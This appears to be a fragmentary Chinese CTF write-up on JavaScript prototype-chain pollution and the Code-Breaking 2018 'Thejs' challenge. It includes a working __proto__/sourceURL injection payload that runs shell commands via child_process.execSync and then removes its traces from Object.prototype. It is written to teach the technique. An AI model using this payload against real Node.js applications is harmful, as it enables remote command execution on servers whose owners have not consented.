一 原型链污染原理
prototype是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法
一个对象的__proto__属性,指向这个对象所在的类的prototype属性
例如 foo.__proto__指向的是Foo类的prototype。那么,如果我们修改了foo.__proto__中的值,意味着就可以修改Foo类
二,简单的原型链污染实验
foo是一个简单的JavaScript对象
foo.bar 此时为1
由于查找顺序的原因,foo.bar仍然是1
此时再用Object创建一个空的zoo对象
查看zoo.bar
查看结果
分析
三, Code-Breaking 2018 Thejs原型链污染复现
1,运用的知识点
2,原理分析
//...merge 给sourceURL赋值 实现任意命令执行 通过原型链污染实现// 
//...new Function(x, 'return y') 相当于function add(x){ return }//
{"__proto__": {"sourceURL": "\u000areturn ()=>{for (var a in {}) {delete Object.prototype[a];}
return global.process.mainModule.constructor._load('child_process').execSync('id')}\u000a//"}//nodejs中有一个模块叫做process process底下有一个子模块叫chid_process
,其下有一个方法叫做execSync('whoami')执行命令//
return global.process.mainModule.constructor._load('child_process').execSync('id')}\u000a//"}}
让原来的return失效,新的return把它替换掉 通过\u000a换行符把return换下来,再注释掉
{"proto": {"sourceURL": "\u000areturn ()=>{for (var a in {})
{delete Object.prototype[a];} 干什么?为了不让其他人看见这个flag,所以我把这个flag删除了
//{delete Object.prototype[a];}将object对象中的所有属性循环出来,再进行删除
三,复现